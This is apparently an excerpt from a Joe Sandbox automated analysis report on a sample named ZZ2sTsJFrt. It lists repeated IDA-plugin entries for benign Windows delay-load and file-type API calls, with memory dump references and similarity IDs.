                                                                          • API String ID: 897784432-0
                                                                          APIs
                                                                          • GetFileType.KERNELBASE(000000FF,00F097BE), ref: 00F098C8
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: FileType
                                                                          • String ID:
                                                                          • API String ID: 3081899298-0
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E1E3
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E1E3
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E1E3
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E1E3
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E1E3
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E1E3
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E1E3
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E1E3
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E1E3
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E1E3
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E1E3
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E1E3
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E1E3
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E1E3
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E3FC
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E3FC
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E3FC
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E580
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E580
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E580
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E51F
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E51F
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
